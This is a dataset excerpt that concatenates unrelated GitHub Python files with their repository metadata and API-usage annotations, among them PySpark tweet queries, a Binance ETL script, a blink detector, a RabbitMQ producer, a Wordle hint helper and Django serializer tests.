"api_name": "tunga_tasks.slugs.BRANCH",
"line_number": 79,
"usage_type": "attribute"
},
{
"api_name": "tunga_tasks.slugs",
"line_number": 79,
"usage_type": "name"
},
{
"api_name": "tunga_tasks.slugs.TAG",
"line_number": 80,
"usage_type": "attribute"
},
{
"api_na... |
42350249999 | from flask import jsonify
from pyspark.sql import SparkSession
import matplotlib.pyplot as plt
import pandas as pd
import io
spark = SparkSession \
.builder \
.appName("Tweets Analysis using Python Saprk") \
.getOrCreate()
# spark is an existing SparkSession
df = spark.read.json("importedtweetsdata.json")
# Register the DataFrame as a SQL temporary view
df.createOrReplaceTempView("MobileTweetsData")
resultdf = spark.sql("SELECT SUBSTR(created_at, 0, 20) tweetsDate, COUNT(1) tweetsCount FROM MobileTweetsData \
where text is not null GROUP BY SUBSTR(created_at, 0, 20) ORDER BY COUNT(1) DESC LIMIT 5")
pd = resultdf.toPandas()
pd.to_csv('Query4Result.csv', index=False)
def query4_output():
#return pd.to_json(orient='records')
return jsonify({"Results":pd.to_json(orient='records')})
def query4_plot():
pd.plot(kind="bar", x="tweetsDate", y="tweetsCount",
title="Number of tweets for date")
image = io.BytesIO()
plt.savefig(image, format='png')
image.seek(0)
return image
| pujithasak/TweetsAnalysisPythonProject | AnalysisQuery4.py | AnalysisQuery4.py | py | 1,055 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pyspark.sql.SparkSession.builder.appName",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pyspark.sql.SparkSession.builder",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "pyspark.sql.SparkSession",
"line_number": 6,
"usage_type": "... |
9157699619 | import argparse
from typing import List
import config
import mysql.connector
from collections import OrderedDict
from binance_data import BinanceData
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
def load(data: List['BinanceData']):
# db connection
# db batch insert new table
# TODO: cnx
# TODO organize it using bulk_insert_mappings
# TODO: learn with clause
cnx = mysql.connector.connect(
host=config.host,
user=config.user,
password=config.passwd,
database="binance_transformed_data")
cursor = cnx.cursor()
# Define insert statement
insert_statement = (
"INSERT INTO binance_transformed_data (symbol, open_time, close_time, open_price, close_price, low_price, high_price, volume, quote_asset_volume, number_of_trades, taker_buy_base_asset_volume, taker_buy_quote_asset_volume, unused) "
"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
)
# Prepare the values to be inserted
data_values = [(d.symbol, d.open_time, d.close_time, d.open_price, d.close_price, d.low_price, d.high_price, d.volume, d.quote_asset_volume, d.number_of_trades, d.taker_buy_base_asset_volume, d.taker_buy_quote_asset_volume, d.unused) for d in data]
# Execute the batch insert
cursor.executemany(insert_statement, data_values)
cnx.commit()
cursor.close()
cnx.close()
# engine = create_engine('mysql+mysqlconnector://username:password@localhost/dbname')
# Session = sessionmaker(bind=engine)
# session = Session()
# for d in data:
# session.add(d)
# session.commit()
# session.close()
# engine = create_engine('mysql+mysqlconnector://username:password@localhost/dbname')
# Session = sessionmaker(bind=engine)
# session = Session()
#
# try:
# # Prepare data for batch insert
# insert_data = [
# {
# 'symbol': obj.symbol,
# 'open_time': obj.open_time,
# 'open_price': obj.open_price,
# 'high_price': obj.high_price,
# 'low_price': obj.low_price,
# 'close_price': obj.close_price,
# 'volume': obj.volume,
# 'close_time': obj.close_time,
# 'quote_asset_volume': obj.quote_asset_volume,
# 'number_of_trades': obj.number_of_trades,
# 'taker_buy_base_asset_volume': obj.taker_buy_base_asset_volume,
# 'taker_buy_quote_asset_volume': obj.taker_buy_quote_asset_volume,
# 'unused': obj.unused
# }
# for obj in data
# ]
#
# # Perform batch insert
# session.bulk_insert_mappings(binance_data, insert_data)
# session.commit()
# except:
# session.rollback()
# raise
# finally:
# session.close()
def transform(data: List['BinanceData'], interval:int) -> List['BinanceData']:
# interval combine, e.g.: combine five 1min data into one 5min data
# str -> double
if interval <= 0:
raise ValueError() #TODO
transformed_data = []
for i in range(0, len(data), interval):
chunk = data[i:min(i+interval, len(data))]
first = chunk[0]
last = chunk[-1]
low_price = high_price = first.low_price
volume = quote_asset_volume = number_of_trades = taker_buy_base_asset_volume = taker_buy_quote_asset_volume = 0
for d in chunk:
low_price = min(low_price, d.low_price)
high_price = max(high_price, d.high_price)
volume += d.volume
quote_asset_volume += d.quote_asset_volume
number_of_trades += d.number_of_trades
taker_buy_base_asset_volume += d.taker_buy_base_asset_volume
taker_buy_quote_asset_volume += d.taker_buy_quote_asset_volume
combined = BinanceData(
symbol=first.symbol,
open_time=first.open_time,
close_time=last.close_time,
open_price=first.open_price,
close_price=last.close_price,
low_price=low_price,
high_price=high_price,
volume=volume,
quote_asset_volume=quote_asset_volume,
number_of_trades=number_of_trades,
taker_buy_base_asset_volume=taker_buy_base_asset_volume,
taker_buy_quote_asset_volume=taker_buy_quote_asset_volume,
unused=last.unused
)
combined.open_price = first.open_price
transformed_data.append(combined)
return transformed_data
def get_in_time_range(symbol, startTime: int, endTime: int, limit=500) -> List['BinanceData']:
'''
Get a list of BinanceData from the database within a specified time range.
:param start_time: The start of the time range (unix time).
:param end_time: The end of the time range (unix time).
:return: a list of BinanceData
'''
# session = Session()
cnx = mysql.connector.connect(
host=config.host,
user=config.user,
password=config.passwd,
database="binance_source_data")
cursor = cnx.cursor(dictionary=True)
offset = 0
data = []
# while True:
# try:
# # Query the database for BinanceData objects within the specified time range
# chunk = session.query(BinanceData).filter(BinanceData.open_time >= startTime,
# BinanceData.open_time <= endTime) \
# .order_by(BinanceData.open_time) \
# .offset(offset) \
# .limit(limit) \
# .all()
# finally:
# session.close()
query = ("SELECT * FROM binance_data "
"WHERE open_time >= %s AND open_time <= %s AND symbol = %s "
"ORDER BY open_time ASC "
"LIMIT %s OFFSET %s")
while True:
cursor.execute(query, (startTime, endTime, symbol, limit, offset))
chunk = cursor.fetchall()
if not chunk:
break
for row in chunk:
binance_data_dict = OrderedDict([
('symbol', row['symbol']),
('open_time', row['open_time']),
('open_price', row['open_price']),
('high_price', row['high_price']),
('low_price', row['low_price']),
('close_price', row['close_price']),
('volume', row['volume']),
('close_time', row['close_time']),
('quote_asset_volume', row['quote_asset_volume']),
('number_of_trades', row['number_of_trades']),
('taker_buy_base_asset_volume', row['taker_buy_base_asset_volume']),
('taker_buy_quote_asset_volume', row['taker_buy_quote_asset_volume']),
('unused', row['unused'])
])
binance_data_obj = BinanceData(**binance_data_dict)
data.append(binance_data_obj)
offset += limit
cnx.close()
return data
# if not chunk:
# break
#
# data.extend(chunk)
# offset += limit
#
# return data
# try:
# # Query the database for BinanceData objects within the specified time range
# data = session.query(BinanceData).filter(BinanceData.open_time >= startTime,
# BinanceData.open_time <= endTime).all()
# finally:
# session.close()
#
# return data
def transform_job(symbol, startTime, endTime, interval):
# TODO: complete this logic
# get data from database List of binance data
# for-loop/while-loop
# 1.1000
# 2.1000
data = get_in_time_range(symbol, startTime, endTime)
transformed_data = transform(data, interval)
load(transformed_data)
# for i in range(0, len(data), 1000):
# chunk = data[i:i + 1000] # TODO min(i+1000, len(data))
# transformed_data = transform(chunk, interval)
# load(transformed_data)
# resListOfData = transform(listOfData, interval)
# load(resListOfData)
# pass
def main():
args = parse_args()
symbol, startTime, endTime, interval = args.symbol, int(args.startTime), int(args.endTime), int(args.interval)
if startTime >= endTime:
raise ValueError(f"startTime returns trades from that time and endTime returns trades starting from the endTime"
f"including all trades before that time. startTime must be smaller than endTime")
# if endTime - startTime > 500mins, 1D = 24*60 = 1440mins
transform_job(symbol=symbol, startTime=startTime, endTime=endTime, interval=interval)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--symbol', type=str)
parser.add_argument('--startTime', type=int)
parser.add_argument('--endTime', type=int)
parser.add_argument('--interval', type=int)
return parser.parse_args()
if __name__ == '__main__':
main() | Sherry-W071/Real-time-Cryptocurrency-Data-Aggregation-and-Processing-Pipeline | transform_load.py | transform_load.py | py | 9,045 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "mysql.connector.connector.connect",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "mysql.connector.connector",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_... |
34729716556 | #!/usr/bin/python3
from twitter import *
import time
import json
with open('./conf.json') as file: conf = json.load(file)
tw = Twitter(auth=OAuth(conf['token'], conf['token_key'], conf['con_sec'], conf['con_sec_key']))
maxcount = 5000
friends = []
followers = []
res = tw.friends.ids(count=maxcount)
cursor = -1
while cursor != 0:
for id in res['ids']: friends.append(id)
cursor = res['next_cursor']
res = tw.friends.ids(count=maxcount,cursor=cursor)
res = tw.followers.ids(count=maxcount)
cursor = -1
while cursor != 0:
for id in res['ids']: followers.append(id)
cursor = res['next_cursor']
res = tw.followers.ids(count=maxcount,cursor=cursor)
print("%s friends (users subscribed by the account)." % len(friends))
print("%s followers (users following the account)." % len(followers))
print("\n")
friendsOnly = list(set(friends) - set(followers))
for uid in friendsOnly:
print("uid: %s" % uid)
res = tw.friendships.destroy(user_id=uid)
print("%i friendsOnly removed : %s\n" % (len(friendsOnly), friendsOnly))
| jdxlabs/twitter_diff | remove_friendsonly.py | remove_friendsonly.py | py | 1,048 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.load",
"line_number": 5,
"usage_type": "call"
}
] |
8402296505 | from argparse import ArgumentParser
import json, logging
import seeker.podSeeker as Seeker
import judge.simpleJudge as Judge
import updater.simpleUpdater as Updater
class installed_query_info():
def __init__(self, query_id, src_id, dst_id):
self.query_id = query_id
self.src_id = src_id
self.dst_id = dst_id
# initialize switch perference weight
def init_env():
total_switch_size = 20
switch_weights = [0] * total_switch_size
switch_loads = [0] * total_switch_size
for i in range(total_switch_size):
switch_loads[i] = []
return switch_weights, switch_loads
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("-q", "--query", help="Query input file location", dest="query_location", default="./data/queries.json")
args = parser.parse_args()
logging.basicConfig(level=logging.INFO)
switch_weights, switch_loads = init_env()
with open(args.query_location, 'r') as inputQueries:
unparsed_queries = inputQueries.read()
queries = json.loads(unparsed_queries)
for query in queries:
edge_sw1, edge_sw2 = Seeker.find_edge_switch_on_path(
switch_id1=query['src_host_id'],
switch_id2=query['dst_host_id'],
pod_scale=4)
aggr_sw1, aggr_sw2 = Seeker.find_aggr_switch_on_path(
edge_id1=edge_sw1,
edge_id2=edge_sw2,
pod_scale=4)
core_sws = Seeker.find_core_switch_on_path(pod_scale=4)
edge_weight_1 = switch_weights[edge_sw1]
edge_weight_2 = switch_weights[edge_sw2]
aggr_weight_1, aggr_weight_2, core_weight = 0, 0, 0
hybrid_weight_1, hybrid_weight_2, hybrid_weight_3, hybrid_weight_4 = 0, 0, 0, 0
for aggr_sw in aggr_sw1:
aggr_weight_1 += switch_weights[aggr_sw]
for aggr_sw in aggr_sw2:
aggr_weight_2 += switch_weights[aggr_sw]
for core_sw in core_sws:
core_weight += switch_weights[core_sw]
hybrid_sw1 = [aggr_sw1[0], core_sws[0], core_sws[1]]
hybrid_sw2 = [aggr_sw1[1], core_sws[2], core_sws[3]]
hybrid_sw3 = [aggr_sw2[0], core_sws[0], core_sws[1]]
hybrid_sw4 = [aggr_sw2[1], core_sws[2], core_sws[3]]
for sw_id in hybrid_sw1:
hybrid_weight_1 += switch_weights[sw_id]
for sw_id in hybrid_sw2:
hybrid_weight_2 += switch_weights[sw_id]
for sw_id in hybrid_sw3:
hybrid_weight_3 += switch_weights[sw_id]
for sw_id in hybrid_sw4:
hybrid_weight_4 += switch_weights[sw_id]
chosen_pos = Judge.find_lowest_cost_node(
[edge_weight_1, edge_weight_2, aggr_weight_1, aggr_weight_2, core_weight,
hybrid_weight_1, hybrid_weight_2, hybrid_weight_3, hybrid_weight_4],
[edge_sw1, edge_sw2, aggr_sw1, aggr_sw2, core_sws, hybrid_sw1, hybrid_sw2,
hybrid_sw3, hybrid_sw4])
Updater.update_weight(weights=switch_weights, pos=chosen_pos)
installed_query = installed_query_info(query_id=query['query_id'],
src_id=query['src_host_id'], dst_id=query['dst_host_id'])
if isinstance(chosen_pos, list):
for pos in chosen_pos:
switch_loads[pos].append(installed_query)
elif isinstance(chosen_pos, int):
switch_loads[chosen_pos].append(installed_query)
# print results
print("####### Control Plane Placement Results #######")
for index, loads in enumerate(switch_loads):
if len(loads) > 0:
print("Switch %d got %d tasks" % (index, len(loads)))
'''
for load in loads:
if isinstance(load, installed_query_info):
print("Switch %d install query no.%d, from host %d to host %d" %
(index, load.query_id, load.src_id, load.dst_id))
'''
| In-Net/NQATP | stimulator/easy_seeker.py | easy_seeker.py | py | 3,891 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "logging.basicConfig",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "json.lo... |
20528044643 | import pika
connection = pika.BlockingConnection( #建立连接
pika.ConnectionParameters(host='localhost')
)
channel = connection.channel() #声明一个管道
#声明QUEUE
channel.queue_declare(queue='hello2',durable=True)
channel.basic_publish(exchange='',
routing_key='hello2',
body='Hello World!',
properties=pika.BasicProperties(delivery_mode=2,
)
)
#routing_key queue名字
#body 消息
print(" [x] Sent 'Hello World!3'")
connection.close() #关闭连接 | chenyaqiao0505/Code111 | RabbitMQ/producter.py | producter.py | py | 572 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pika.BlockingConnection",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "pika.ConnectionParameters",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "pika.BasicProperties",
"line_number": 15,
"usage_type": "call"
}
] |
25952738898 | #encoding utf-8
from openpyxl import load_workbook
from openpyxl import Workbook
from openpyxl.worksheet.table import Table, TableStyleInfo
import os
import re
def salvar_email():
path = 'E:/4 - ARQUIVO\PROJETOS\motor\email.xlsx'
arquivo_excel = load_workbook(path)
separados = arquivo_excel.active # Le a planilha ativa
'''
# obter sheets
sheets = arquivo_excel.sheetnames
planilha1 = arquivo_excel[sheets[n]]
'''
#ler linha a linha
max_linha = separados.max_row
max_coluna = separados.max_column
contador = 1
for i in range(1, max_linha):
a1 = str(separados.cell(row=i, column=1, ).value)
#print(type(str(a1.value)))
#print(str(a1.value))
if re.search('\\SMTP\\b', a1, re.IGNORECASE):
email = a1.split(',')
for g in range(len(email)):
if re.search('ricardo.campos', email[g], re.IGNORECASE):
email[g] = "0"
if re.search('postmaster', email[g], re.IGNORECASE):
email[g] = "0"
if re.search('@', email[g], re.IGNORECASE):
email[g] = email[g][:-1]
email[g] = email[g][1:]
# setando nova planilha para gravação (OBS não desativa a planilha ativa)
result = arquivo_excel['result']
result.cell(row=contador, column=2).value = email[g]
contador = contador + 1
print(email[g])
arquivo_excel .save(path)
os.system("PAUSE")
def retira():
path = 'E:/4 - ARQUIVO\PROJETOS\motor\email.xlsx'
arquivo_excel = load_workbook(path)
# obter sheets B 01 -Intelbras
sheets = arquivo_excel.sheetnames
print(sheets)
sheet1 = arquivo_excel[sheets[0]]
sheet2 = arquivo_excel[sheets[1]]
sheet3 = arquivo_excel[sheets[2]]
# ler linha a linha
max_linha = sheet3.max_row
max_coluna = sheet3.max_column
contador = 1
for i in range(1, max_linha):
a1 = str(sheet3.cell(row=i, column=2, ).value)
#a1 = a1.split(' ')
print(a1[5:])
sheet2.cell(row=contador, column=4).value = a1[5:]
contador = contador + 1
arquivo_excel.save(path)
os.system("PAUSE")
#salvar_email()
retira()
| ricardocvel/buscarEmail_excel- | inteirarExcel.py | inteirarExcel.py | py | 2,400 | python | pt | code | 0 | github-code | 36 | [
{
"api_name": "openpyxl.load_workbook",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "re.IGNORECASE",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "re.search",
"... |
10022682639 | import os
import re
import openai
from dotenv import load_dotenv
load_dotenv()
openai.api_key = os.environ['OPENAI_API_KEY']
def request_chatgpt(messages: list):
return openai.ChatCompletion.create(
model="gpt-3.5-turbo",
messages=messages,
)
def analyze_toots(mastodon_timelines: list) -> tuple[list[int], str]:
message_content = ''.join([f"id={toot.id} - {re.sub(re.compile('<.*?>'), '', toot.content)}\n" for toot in mastodon_timelines])
response = request_chatgpt(
messages=[
{"role": "user", "content": message_content},
{
"role": "system",
"content": """
You are a professional analyst.
Please output `id list of statements about programming` based on the following constraints and input statements.
# Constraints
- Output no more than 20 IDs.
- Use this format for output : `{id}, {id}, {id}, {id}, {id}`
I'll send you the input data.
""",
},
]
)["choices"][0]["message"]["content"]
relevant_toot_ids = [int(re.sub(r"\D", "", id)) for id in response.split(',') if re.search(r"\d", id)]
return relevant_toot_ids, response
| mio256/mastardon | page/chatgpt_func.py | chatgpt_func.py | py | 1,302 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "openai.api_key",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "openai.ChatComple... |
26896963958 | #!/usr/bin/env python3
import sys
import time
import socket
import yaml
from dataclasses import asdict
import ipywidgets.widgets as widgets
from IPython.display import display
print(sys.executable)
from ecat_repl import ZmsgIO
from ecat_repl import FoeMaster
from ecat_repl import CtrlCmd
from ecat_repl import SdoCmd
from ecat_repl import SdoInfo
from ecat_repl import (
master_cmd_stop,
master_cmd_start,
master_cmd_get_slave_descr,
#
flash_cmd_load_default,
flash_cmd_save_flash,
flash_cmd_load_flash,
#
ctrl_cmd_start,
ctrl_cmd_stop,
ctrl_cmd_fan,
ctrl_cmd_led,
ctrl_cmd_run_torque_calib,
ctrl_cmd_set_home,
ctrl_cmd_set_zero,
ctrl_cmd_set_min_pos,
ctrl_cmd_set_max_pos,
ctrl_cmd_set_position,
ctrl_cmd_set_velocity,
ctrl_cmd_set_torque,
ctrl_cmd_set_current,
ctrl_cmd_dac_tune,
ctrl_cmd_get_adc,
ctrl_cmd_set_dac,
ctrl_cmd_test_done,
ctrl_cmd_test_error,
)
uri = "localhost:5555"
io = ZmsgIO(uri)
io.debug = False
scan_ids = []
io.doit(master_cmd_stop)
io.doit(master_cmd_start.set_args({'app_mode':'config_mode','use_ecat_pos_as_id':'true'}))
reply = io.doit(master_cmd_get_slave_descr)
yaml_msg = yaml.safe_load(reply['msg'])
scan_ids = yaml_msg.keys()
ids=list(scan_ids)
print(ids)
reply = io.doit(SdoInfo(u'SDO_NAME').set_bid(ids[0]))
yaml_msg = yaml.safe_load(reply['msg'])
sdo_names = yaml_msg
print(sdo_names)
reply = io.doit(SdoInfo(u'SDO_OBJD').set_bid(ids[0]))
yaml_msg = yaml.safe_load(reply['msg'])
sdo_infos = yaml_msg
print(sdo_infos)
for i in range(100):
reply = io.doit(SdoCmd(rd_sdo=sdo_names,wr_sdo={}).set_bid(ids[0]))
yaml_msg = yaml.safe_load(reply['msg'])
print(yaml_msg)
time.sleep(0.1)
#io.doit(SdoCmd(rd_sdo=['fw_ver'],wr_sdo={'board_id': 101}).set_bid(ids[0]))
#io.doit(flash_cmd_save_flash.set_bid(ids[0])) | alessiomargan/Ecat-repl | ecat_repl/test/ecat_advr.py | ecat_advr.py | py | 1,873 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.executable",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "ecat_repl.ZmsgIO",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "ecat_repl.master_cmd_stop",
"line_number": 53,
"usage_type": "argument"
},
{
"api_name": "ec... |
2286638164 | from collections import Counter
def get_hints(word: str, secret_word: str):
word = word.lower()
result = [""] * len(word)
missing_indexes = []
secrect_counter = Counter(secret_word)
for idx, c in enumerate(word):
if c == secret_word[idx]:
result[idx] = "green"
secrect_counter[c] -= 1
else:
missing_indexes.append(idx)
for idx in missing_indexes:
c = word[idx]
if c in secrect_counter and secrect_counter[c] > 0:
result[idx] = "yellow"
secrect_counter[c] -= 1
else:
result[idx] = "black"
if word == secret_word:
return result
else:
return result
| pythonfoo/rest-wordle | rest_wordle/utils.py | utils.py | py | 712 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.Counter",
"line_number": 9,
"usage_type": "call"
}
] |
7158973131 | import os
import shutil
from pathlib import Path
from os import system
from shutil import rmtree
import shutil
mi_ruta = Path(Path.home(), '\Programacion-Cursos-Desarrollador\Python\Python-proyecto1\Dia7\Banco')
class Persona:
def __init__(self, nombre, apellido):
self.nombre = nombre
self.apellido = apellido
class Cliente(Persona):
def __init__(self, nombre, apellido, numero_cuenta, balance = 0):
super().__init__(nombre, apellido) # heredado de class Persona
self.numero_cuenta = numero_cuenta
self.balance = balance
ruta_balance = Path(mi_ruta, 'BalanceCuenta.txt')
BalanceCuentaLeer = open(ruta_balance)
contenidoBalanceCuentaLeer = BalanceCuentaLeer.read()
# print("Prueba balance print: ", contenidoBalanceCuentaLeer)
# print("Tipo de dato: ", type(contenidoBalanceCuentaLeer))
balance_int = int(contenidoBalanceCuentaLeer)
# print("Tipo de dato 2: ", type(contenidoBalanceCuentaLeer))
self.balance = balance_int
# print(type(self.balance))
BalanceCuentaLeer.close()
def __str__(self):
return f"Cliente: { self.nombre } { self.apellido }\nNumero de Cuenta: { self.numero_cuenta }\nBalance: ${ self.balance }"
def depositar(self, monto_deposito):
self.balance += monto_deposito
ruta_depositar = Path(mi_ruta, 'RegistroTransacciones.txt')
ruta_balance = Path(mi_ruta, 'BalanceCuenta.txt')
archivoRegistroTransacciones = open(ruta_depositar, "a")
archivoRegistroTransacciones.write(f"{ monto_deposito } - INGRESO\n")
archivoRegistroTransacciones.close()
# Path.write_text(ruta_depositar, str(monto_deposito)) error, ya que no haria salto de linea \n
Path.write_text(ruta_balance, str(self.balance))
print("Deposito Aceptado")
def retirar(self, monto_retiro):
if self.balance >= monto_retiro:
self.balance -= monto_retiro
ruta_depositar = Path(mi_ruta, 'RegistroTransacciones.txt')
ruta_balance = Path(mi_ruta, 'BalanceCuenta.txt')
archivoRegistroTransacciones = open(ruta_depositar, "a")
archivoRegistroTransacciones.write(f"{monto_retiro} - RETIRO\n")
archivoRegistroTransacciones.close()
Path.write_text(ruta_balance, str(self.balance))
print("Retiro Realizado")
else:
print("Fondos Insuficientes Para el Retiro")
def crear_cliente():
nombre_cl = input("Ingrese su Nombre: ")
apellido_cl = input("Ingrese su Apellido: ")
numero_cuenta = input("Ingrese Su Numero de Cuenta: ")
cliente = Cliente(nombre_cl, apellido_cl, numero_cuenta) # class Cliente
return cliente
def inicio():
mi_cliente = crear_cliente()
print(mi_cliente) # f"Cliente: { self.nombre } { self.apellido }\nNumero de Cuenta: { self.numero_cuenta }\nBalance: { self.balance }"
opcion = 0
while opcion != 'S': # 'S' salir
print('Elija: Depositar (D), Retirar (R), Salir (S)')
opcion = input()
if opcion == 'D':
monto_dep = int(input("Monto a Depositar: $"))
mi_cliente.depositar(monto_dep)
elif opcion == 'R':
monto_dep = int(input("Monto a Retirar: $"))
mi_cliente.retirar(monto_dep)
print(mi_cliente) # mostrar como queda cliente despues de esas operaciones
print("Gracias Por Su Visita - Hasta Luego")
inicio()
# proyecto: https://www.udemy.com/course/python-total/learn/lecture/28747292#questions
# convertir str a int: https://www.freecodecamp.org/news/python-convert-string-to-int-how-to-cast-a-string-in-python/#:~:text=To%20convert%2C%20or%20cast%2C%20a,int(%22str%22)%20.
# convertir int a str: https://es.stackoverflow.com/questions/364966/como-convertir-un-dato-int-a-string-en-python
| Alexa-Silvermoon/curso-python-proyectos-udemy-federico | Dia7/ProyectoDelDia7 - mejorada cuenta bancaria.py | ProyectoDelDia7 - mejorada cuenta bancaria.py | py | 3,868 | python | es | code | 0 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pathlib.Path.home",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_nu... |
3829108374 | # coding: utf-8
# 前端测试是否眨眼,用于活体检测 Front-end test blinks for biopsy
from scipy.spatial import distance as dist
from imutils import face_utils
import time
import dlib
import cv2
def eye_aspect_ratio(eye):
# 计算两只眼睛之间的垂直欧式距离
A = dist.euclidean(eye[1], eye[5])
B = dist.euclidean(eye[2], eye[4])
# 计算两眼之间的水平欧式距离
C = dist.euclidean(eye[0], eye[3])
# 计算眼睛纵横比
ear = (A + B) / (2.0 * C)
# return the eye aspect ratio
return ear
def main():
shape_predictor = "shape_predictor_68_face_landmarks.dat"
EYE_AR_THRESH = 0.27 # 阈值
EYE_AR_CONSEC_FRAMES = 33 # the number of consecutive frames the eye must be below the threshold
# initialize the frame counters and the total number of blinks
COUNTER = 0
TOTAL = 0
# initialize dlib's face detector (HOG-based) and then create
# the facial landmark predictor
print("[INFO] loading facial landmark predictor...")
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(shape_predictor)
# grab the indexes of the facial landmarks for the left and right eye, respectively
(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS["left_eye"]
(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS["right_eye"]
# start the video stream thread
print("[INFO] starting video stream thread...")
print("[INFO] print q to quit...")
vs = cv2.VideoCapture(1)
time.sleep(1.0)
# loop over frames from the video stream
while True:
# grab the frame from the threaded video file stream, resize it, and convert it to grayscale channels)
_, frame = vs.read()
frame = cv2.resize(frame, (0, 0), fx=0.75,fy=0.75)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# detect faces in the grayscale frame
rects = detector(gray, 0)
# loop over the face detections
for rect in rects:
# determine the facial landmarks for the face region, then
# convert the facial landmark (x, y)-coordinates to a NumPy array
shape = predictor(gray, rect)
shape = face_utils.shape_to_np(shape)
# extract the left and right eye coordinates, then use the
# coordinates to compute the eye aspect ratio for both eyes
leftEye = shape[lStart:lEnd]
rightEye = shape[rStart:rEnd]
leftEAR = eye_aspect_ratio(leftEye)
rightEAR = eye_aspect_ratio(rightEye)
# average the eye aspect ratio together for both eyes
ear = (leftEAR + rightEAR) / 2.0
# compute the convex hull for the left and right eye, then visualize each of the eyes
leftEyeHull = cv2.convexHull(leftEye)
rightEyeHull = cv2.convexHull(rightEye)
cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)
cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)
# check to see if the eye aspect ratio is below the blink
# threshold, and if so, increment the blink frame counter
if ear < EYE_AR_THRESH:
COUNTER += 1
# otherwise, the eye aspect ratio is not below the blink threshold
else:
# if the eyes were closed for a sufficient number of then increment the total number of blinks
if COUNTER >= EYE_AR_CONSEC_FRAMES:
return 1
# reset the eye frame counter
COUNTER = 0
# draw the total number of blinks on the frame along with the computed eye aspect ratio for the frame
cv2.putText(frame, "Blinks: {}".format(TOTAL), (10, 30),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
cv2.putText(frame, "EAR: {:.2f}".format(ear), (300, 30),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# do a bit of cleanup
cv2.destroyAllWindows()
if __name__ == '__main__':
main()
| HollowMan6/Lanck-Face-Recognition-Lock-Competition-Backend-Code | Development-Board/DetectBlinks.py | DetectBlinks.py | py | 4,286 | python | en | code | 22 | github-code | 36 | [
{
"api_name": "scipy.spatial.distance.euclidean",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "scipy.spatial.distance",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "scipy.spatial.distance.euclidean",
"line_number": 13,
"usage_type": "call"
},
... |
35658691918 | """The filtersets tests module."""
import pytest
from django.db.models.query import QuerySet
from django.http import HttpRequest
from communication.serializer_fields import (ParentMessageForeignKey,
UserReviewForeignKey)
from conftest import OBJECTS_TO_CREATE
pytestmark = pytest.mark.django_db
def test_user_review_foreign_key(reviews: QuerySet):
"""Should return the filtered list of reviews by a user."""
obj = UserReviewForeignKey()
request = HttpRequest()
user = reviews[0].professional.user
request.user = user
obj._context = {"request": request} # pylint: disable=protected-access
result = obj.get_queryset()
assert reviews.count() == 2
assert result.count() == 1
assert result.first().professional.user == user
def test_parent_message_foreign_key(messages: QuerySet):
"""Should return the filtered list of messages by a user."""
obj = ParentMessageForeignKey()
request = HttpRequest()
user = messages[0].sender
request.user = user
obj._context = {"request": request} # pylint: disable=protected-access
result = obj.get_queryset()
assert messages.count() == OBJECTS_TO_CREATE * 4
assert result.count() == OBJECTS_TO_CREATE
assert result.first().recipient == user
| webmalc/d8base-backend | communication/tests/serializer_fields_tests.py | serializer_fields_tests.py | py | 1,305 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pytest.mark",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "django.db.models.query.QuerySet",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "communication.serializer_fields.UserReviewForeignKey",
"line_number": 15,
"usage_type": ... |
41165135533 | # -*- coding: utf-8 -*-
'''
This file is part of Habitam.
Habitam is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
Habitam is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
